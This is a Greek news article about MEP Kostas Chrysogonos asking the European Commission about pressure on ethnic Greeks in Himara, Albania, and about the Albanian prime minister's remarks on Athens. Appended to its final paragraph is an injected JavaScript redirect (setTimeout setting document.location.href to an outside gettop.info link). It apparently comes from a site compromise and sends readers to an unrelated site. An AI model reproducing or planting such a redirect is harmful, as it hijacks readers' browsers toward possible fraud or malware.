Χρυσόγονος στο Ευρωκοινοβούλιο για τους Έλληνες της Χειμάρρας

0
17

 

Την ανησυχία του για τις προκλήσεις εις βάρος Ελλήνων της Χειμάρρας εξέφρασε ο Κώστας Χρυσόγονος με επείγουσα ερώτηση στην Ευρωπαϊκή Επιτροπή.

Ο κ. Χρυσόγονος  αναφέρθηκε στις πιέσεις που ασκούνται σε Έλληνες της Χειμμάρας να εγκαταλείψουν τις εστίες τους, για τις οποίες ειδοποιήθηκαν ότι θα κατεδαφισθούν και ζήτησε τη θέση της Επιτροπής, υπό το πρίσμα της προοπτικής έναρξης ενταξιακών διαπραγματεύσεων με την Αλβανία.

Αναφέρθηκε επίσης στις εμπρηστικές δηλώσεις του Αλβανού πρωθυπουργού για την Αθήνα και την Ακρόπολη, τονίζοντας πως οι συντονισμένες προκλήσεις εις βάρος Ελλήνων δημιουργούν τριβές σε μια ευαίσθητη γεωγραφική ζώνη.

Αναλυτικά, ο κ. Χρυσόγονος ερωτά την Επιτροπή:

Α) Καθώς ο σεβασμός της αρχής του Κράτους Δικαίου, των δικαιωμάτων των πολιτών και ιδίως των μειονοτήτων αποτελεί βασικό και αναπόσπαστο κριτήριο για την έναρξη ενταξιακών διαπραγματεύσεων με την Αλβανία, ποιες πιέσεις προτίθεται να ασκήσει ώστε να προστατευθούν τα δικαιώματα των Ελλήνων της περιοχής;

Β) Πώς σχολιάζει τις πρακτικές που ακολουθεί το αλβανικό κράτος, σε συνδυασμό με τις απρόκλητες και εμπρηστικές δηλώσεις του αλβανού πρωθυπουργού, βάσει των οποίων η Αθήνα στο παρελθόν κατοικείτο από αλβανόφωνους, οι οποίοι ουσιαστικά προστάτεψαν την Ακρόπολη από καταστροφή[2]; Διακρίνει συντονισμένη προσπάθεια δημιουργίας τριβών σε μια ευαίσθητη γεωγραφική ζώνη, η οποία σχετίζεται άμεσα με τις προοπτικές ανάπτυξης της Ευρώπης; setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here